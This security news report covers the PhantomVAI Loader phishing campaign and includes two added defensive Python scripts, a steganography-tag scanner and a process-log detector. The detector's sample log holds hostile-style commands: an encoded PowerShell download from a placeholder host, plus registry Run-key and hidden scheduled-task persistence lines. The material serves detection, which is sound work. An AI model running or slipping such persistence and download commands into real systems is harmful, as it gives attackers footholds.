PhantomVAI Loader expands globally, delivering malware to multiple sectors
Farah Amod
October 29, 2025
A new global phishing campaign is using advanced evasion techniques to spread infostealers and remote access trojans across industries worldwide.
What happened
According to Cyber Press, cybersecurity researchers uncovered a widespread phishing operation deploying a sophisticated multi-stage malware loader dubbed PhantomVAI Loader. The campaign has targeted organizations in manufacturing, education, healthcare, government, and utilities sectors.
The attack begins with phishing emails posing as invoices or payment notifications containing malicious JavaScript or VBS attachments. These execute encoded PowerShell scripts that download disguised image files, hiding the loader’s payload using steganography.
Going deeper
PhantomVAI Loader’s payload is concealed in Base64-encoded data embedded within image files, identified by tags such as <<sudo_png>> and <<sudo_odt>>. Written in C#, the loader checks whether it’s running in a virtual machine, establishes persistence, and retrieves its final malware payload from attacker-controlled command-and-control (C2) servers.
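The marker tags quoted above are a concrete, file-level artefact that defenders can hunt for in mail attachments and web downloads. The following Python script is an added example (not code from the article, Cyber Press, or Paubox) that scans a file's bytes for the reported tags, checks whether a Base64 run follows each tag, and records the decoded length and SHA-256 for triage without executing anything. The layout it assumes, that the Base64 blob sits directly after a tag, and the sample "image" it builds are constructed for the example rather than taken from a real PhantomVAI sample.

```python
import base64
import binascii
import hashlib
import re

# Marker tags the article reports for PhantomVAI Loader. That the Base64
# blob sits immediately after a tag (optionally after whitespace) is an
# assumption made for this example, not a detail taken from the article.
MARKER_TAGS = (b"<<sudo_png>>", b"<<sudo_odt>>")

# A run of Base64 alphabet characters; 64 is an assumed minimum so that
# short accidental matches are ignored.
_B64_AFTER_TAG = re.compile(rb"\s*([A-Za-z0-9+/]{64,}={0,2})")

# Constructed stand-in for a hidden payload; it is plain text, not a loader.
SAMPLE_PAYLOAD = b"constructed placeholder payload bytes, not a real loader " * 3


def scan_for_stego_markers(data: bytes) -> list[dict]:
    """Return one finding per marker tag found in *data*.

    Each finding records the tag, its byte offset, the length of the Base64
    run following it and, when that run decodes cleanly, the length and
    SHA-256 of the decoded bytes for triage. Nothing is executed.
    """
    findings = []
    for tag in MARKER_TAGS:
        start = 0
        while (idx := data.find(tag, start)) != -1:
            finding = {"tag": tag.decode(), "offset": idx, "blob_len": 0,
                       "decoded_len": None, "decoded_sha256": None}
            m = _B64_AFTER_TAG.match(data, idx + len(tag))
            if m:
                blob = m.group(1)
                finding["blob_len"] = len(blob)
                try:
                    decoded = base64.b64decode(blob, validate=True)
                except binascii.Error:
                    decoded = None  # tag present but the run is not clean Base64
                if decoded is not None:
                    finding["decoded_len"] = len(decoded)
                    finding["decoded_sha256"] = hashlib.sha256(decoded).hexdigest()
            findings.append(finding)
            start = idx + len(tag)
    return findings


def is_suspicious_image(data: bytes) -> bool:
    """True when the bytes carry any PhantomVAI-style marker tag."""
    return bool(scan_for_stego_markers(data))


def build_sample_image() -> bytes:
    """Constructed PNG-like bytes with one embedded tag + Base64 blob (test data only)."""
    png_magic = b"\x89PNG\r\n\x1a\n"
    blob = base64.b64encode(SAMPLE_PAYLOAD)
    return png_magic + b"\x00" * 128 + b"<<sudo_png>>" + blob + b"\x00" * 16


if __name__ == "__main__":
    for f in scan_for_stego_markers(build_sample_image()):
        print(f)
```

A tag whose trailing data does not decode is still reported, because the marker alone is enough to quarantine the file for analysis; the hash of a cleanly decoded blob is what an analyst would pivot on when comparing samples across mailboxes.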
The loader uses multiple persistence mechanisms, including scheduled PowerShell tasks, Windows registry Run keys, and WScript executions, to survive reboots. Once active, it injects malicious code into legitimate Windows processes, such as MSBuild.exe, to evade antivirus and endpoint detection tools.
PhantomVAI has been observed delivering a range of malware, including Katz Stealer, AsyncRAT, XWorm, FormBook, and DCRat. These tools can capture credentials, exfiltrate sensitive data, and provide remote system control to attackers.
The big picture
The PhantomVAI campaign shows how phishing has become a launchpad for advanced, multi-stage malware delivery. Attackers are hiding payloads inside image files, using legitimate Windows processes to stay invisible, and spreading across industries that rely heavily on email for operations. With malware-as-a-service kits like this now available to anyone, sophisticated attacks no longer require sophisticated hackers.
Paubox recommends Inbound Email Security as a defense against these kinds of email-borne threats. Its generative AI studies message tone, structure, and sender behavior to detect patterns that don’t match normal communication. That approach helps organizations block malicious emails carrying hidden loaders like PhantomVAI before they ever reach employees’ inboxes.
FAQs
What makes PhantomVAI Loader different from traditional malware loaders?
Unlike conventional loaders, PhantomVAI uses steganography to hide its payload inside image files, making detection through standard antivirus scanning much harder.
How does the use of MSBuild.exe help attackers evade detection?
MSBuild.exe is a legitimate Microsoft process used for software builds. By injecting code into it, attackers disguise malicious activity as normal system operations, bypassing many security tools.
Why are Malware-as-a-Service (MaaS) kits like Katz Stealer significant?
MaaS kits allow cybercriminals with limited technical skills to deploy sophisticated attacks by purchasing ready-made malware packages on underground markets.
How can organizations detect or block PhantomVAI-related activity?
Organizations should monitor PowerShell and MSBuild activity logs, enforce strict email filtering, and block known C2 domains associated with PhantomVAI campaigns.
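The chain described earlier (mail client to JS/VBS script host, encoded PowerShell, Run-key and scheduled-task persistence, MSBuild.exe launched from a script) maps directly onto process-creation telemetry. The Python script below is an added example (not from the article, Cyber Press, or Paubox) that applies those rules to a constructed, pipe-delimited process log and decodes any -EncodedCommand argument so an analyst can see what the encoded script does. The log format, process names, paths, user names and the encoded command are all constructed for the example; real Sysmon or EDR records carry more fields.

```python
import base64
import re

# Process hosts named in the article's attack chain.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
MAIL_CLIENTS = {"outlook.exe"}  # assumed: the lure arrives as an email attachment

# PowerShell accepts any unambiguous prefix of -EncodedCommand; capture the
# Base64 argument that follows it.
ENC_FLAG = re.compile(r"(?i)\s-e(?:c|n|nc|ncoded|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
RUN_KEY = re.compile(r"(?i)\\currentversion\\run(?:once)?\b")


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a -EncodedCommand argument, or None if absent or undecodable."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")
    except ValueError:
        return None


def classify(parent: str, image: str, cmdline: str) -> list[str]:
    """Apply the PhantomVAI-chain rules to one process-creation event."""
    parent, image, low = parent.lower(), image.lower(), cmdline.lower()
    rules = []
    if image in SCRIPT_HOSTS and parent in MAIL_CLIENTS:
        rules.append("mail-client-spawned-script-host")
    if image == "powershell.exe" and parent in SCRIPT_HOSTS:
        rules.append("script-host-spawned-powershell")
    if image == "powershell.exe" and ENC_FLAG.search(cmdline):
        rules.append("encoded-powershell")
    if image == "msbuild.exe" and parent in SCRIPT_HOSTS | {"powershell.exe"}:
        rules.append("msbuild-from-script-or-powershell")
    if image in {"reg.exe", "powershell.exe"} and RUN_KEY.search(cmdline):
        rules.append("run-key-persistence")
    if image == "schtasks.exe" and "/create" in low and "powershell" in low:
        rules.append("scheduled-task-powershell")
    return rules


def scan_log(lines) -> list[dict]:
    """Parse 'time|parent|image|cmdline' lines and return only events that fire a rule."""
    results = []
    for n, line in enumerate(lines):
        parts = line.split("|", 3)
        if len(parts) != 4:
            continue  # malformed line: skip rather than crash the scan
        time, parent, image, cmdline = parts
        rules = classify(parent, image, cmdline)
        if rules:
            results.append({"line": n, "time": time, "image": image, "rules": rules,
                            "decoded": decode_encoded_command(cmdline)})
    return results


# Constructed sample log. The encoded command is a harmless download of a
# placeholder .png from a reserved .invalid host, standing in for the image
# fetch the article describes.
_SAMPLE_ENCODED = base64.b64encode(
    "Invoke-WebRequest -Uri http://example.invalid/pic.png -OutFile $env:TEMP\\pic.png".encode("utf-16-le")
).decode()

SAMPLE_LOG_LINES = [
    r'2025-10-29T09:00:01|explorer.exe|outlook.exe|"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE"',
    r'2025-10-29T09:02:14|outlook.exe|wscript.exe|"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\invoice_4471.js"',
    f"2025-10-29T09:02:15|wscript.exe|powershell.exe|powershell.exe -nop -w hidden -enc {_SAMPLE_ENCODED}",
    r'2025-10-29T09:02:20|powershell.exe|reg.exe|reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "wscript.exe C:\Users\alice\AppData\Roaming\upd.vbs"',
    r'2025-10-29T09:02:21|powershell.exe|schtasks.exe|schtasks /create /tn Updater /tr "powershell -w hidden -File C:\Users\alice\AppData\Roaming\upd.ps1" /sc onlogon',
    r"2025-10-29T09:02:30|powershell.exe|MSBuild.exe|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
    r'2025-10-29T10:15:00|devenv.exe|MSBuild.exe|"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe" app.csproj',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(hit["time"], hit["image"], hit["rules"], hit["decoded"] or "")
```

The last sample line, MSBuild.exe started by Visual Studio, fires nothing: the MSBuild rule keys on the parent process rather than the binary, which is what separates a developer's build from a loader using MSBuild.exe as a host. Parent-child pairs are also the field most worth preserving when forwarding these events to a SIEM.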
What does the CIS region targeting exclusion suggest about the threat actor?
The malware’s decision to halt execution on systems using CIS country languages indicates the author may be located in or affiliated with that region, a common tactic to avoid local law enforcement scrutiny.